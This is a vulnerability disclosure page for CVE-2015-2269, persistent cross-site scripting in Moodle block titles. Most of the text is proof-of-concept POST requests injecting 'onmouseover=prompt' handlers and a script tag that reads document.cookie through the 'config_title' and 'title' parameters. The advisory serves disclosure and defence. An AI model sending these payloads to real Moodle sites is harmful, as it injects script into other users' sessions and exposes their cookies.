Skip to content
cyberexploits
webappphptext

Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting

Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting

Publié le 2015-03-17

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/36418.txt7eac4c3a
raw


Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting





Vendor: Moodle Pty Ltd

Product web page: https://www.moodle.org

Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9



Summary: Moodle is a learning platform designed to provide

educators, administrators and learners with a single robust,

secure and integrated system to create personalised learning

environments.



Desc: Moodle suffers from persistent XSS vulnerabilities. Input

passed to the POST parameters 'config_title' and 'title' thru

index.php, are not properly sanitized allowing the attacker to

execute HTML or JS code into user's browser session on the affected

site. Affected components: Blocks, Glossary, RSS and Tags.



Tested on: nginx

           PHP/5.4.22





Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic

                              @zeroscience





Advisory ID: ZSL-2015-5236

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php



Vendor Advisory ID: MSA-15-0013

Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383



CVE ID: CVE-2015-2269

CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269





09.02.2015



--





Random Glossary Entry

---------------------



POST http://WEB/my/index.php HTTP/1.1





_qf__block_glossary_random_edit_form=1

bui_contexts=0

bui_defaultregion=side-pre

bui_defaultweight=4

bui_editid=304

bui_editingatfrontpage=0

bui_pagetypepattern=my-index

bui_parentcontextid=411

bui_region=side-pre

bui_subpagepattern=%@NULL@%

bui_visible=1

bui_weight=4

config_addentry=test

config_invisible=test2

config_refresh=0

config_showconcept=1

config_title=" onmouseover=prompt("XSS1") >

config_type=0

config_viewglossary=test3

mform_isexpanded_id_configheader=1

mform_isexpanded_id_onthispage=0

mform_isexpanded_id_whereheader=0

sesskey=S8TXvxdEKF

submitbutton=Save changes





Remote RSS Feeds

----------------



POST http://WEB/my/index.php HTTP/1.1





_qf__block_rss_client_edit_form=1

bui_contexts=0

bui_defaultregion=side-pre

bui_defaultweight=4

bui_editid=312

bui_editingatfrontpage=0

bui_pagetypepattern=my-index

bui_parentcontextid=411

bui_region=side-pre

bui_subpagepattern=%@NULL@%

bui_visible=1

bui_weight=4

config_block_rss_client_show_channel_image=0

config_block_rss_client_show_channel_link=0

config_display_description=0

config_rssid=_qf__force_multiselect_submission

config_rssid[]=3

config_shownumentries=11

config_title=" onmouseover=prompt("XSS2") >

mform_isexpanded_id_configheader=1

mform_isexpanded_id_onthispage=0

mform_isexpanded_id_whereheader=0

sesskey=S8TXvxdEKF

submitbutton=Save changes





Tags

----



POST http://WEB/my/index.php HTTP/1.1





_qf__block_tags_edit_form=1

bui_contexts=0

bui_defaultregion=side-pre

bui_defaultweight=4

bui_editid=313

bui_editingatfrontpage=0

bui_pagetypepattern=my-index

bui_parentcontextid=411

bui_region=side-pre

bui_subpagepattern=%@NULL@%

bui_visible=1

bui_weight=4

config_numberoftags=80

config_tagtype=

config_title=Tags" onmouseover=prompt("XSS3") >

mform_isexpanded_id_configheader=1

mform_isexpanded_id_onthispage=0

mform_isexpanded_id_whereheader=0

sesskey=S8TXvxdEKF

submitbutton=Save changes





Older not supported versions

----------------------------



POST http://WEB/blog/index.php HTTP/1.1



blockaction=config

filterselect=1343

filtertype=user

instanceid=4992

numberoftags=20

sesskey=0QCG5LQz0Q

sort=name

timewithin=90

title=ZSL"><script>alert(document.cookie);</script>

Voir sur GitHub